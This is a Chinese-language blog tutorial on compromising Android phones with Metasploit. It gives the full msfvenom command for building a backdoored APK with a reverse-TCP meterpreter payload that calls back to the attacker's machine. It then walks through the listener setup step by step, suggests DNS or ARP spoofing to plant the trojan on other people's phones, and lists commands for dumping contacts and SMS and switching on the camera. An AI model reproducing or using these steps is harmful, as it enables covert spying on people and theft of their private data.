MSF入侵安卓手机教程

1.环境:kali-linux 一台安卓手机
2.进入linux终端执行命令:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.140.128 LPORT=5555 R > /root/apk.apk //生成一个带后门的apk文件,IP是自己kali的,查看命令为ipconfig,端口随意,这里我设置了5555.
在这里插入图片描述
启动msfconsole
然后依次输入:
1. use exploit/multi/handler 加载模块
2. set payload android/meterpreter/reverse_tcp 选择Payload
3.show options 查看参数设置
我们看见payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置
1.set LHOST 192.168.140.128这里的地址设置成我们刚才生成木马的IP地址
2.set LPORT 5555 这里的端口设置成刚才我们生成木马所监听的端口
3.exploit 开始执行漏洞 开始监听…

好了,一切准备工作准备就绪,现在要做的就是把木马文件放到别人的手机上,方法比较多 可以DNS arp劫持欺骗等,这里我在模拟器上面测试一下,把前面生成的apk安装在模拟器上面,安装完成后 会在桌面上生成一个MainActivity的程序图标 这个就是我们刚才生成的木马 当我们点击了这个图标 手机会没有任何反应 其实木马已经开始运行起来了
接着我们可以在我们的MSF里看见有一个会话连接了,接着就可以为所欲为了!
在这里插入图片描述
简单的举几个例子吧
dump_contacts 这个是导出电话
dump_sms 这个是导出信息
webcam_list 查看手机有几个摄影头
webcam_stream 开启摄像头
sysinfo 查看手机信息

展开阅读全文

没有更多推荐了,返回首页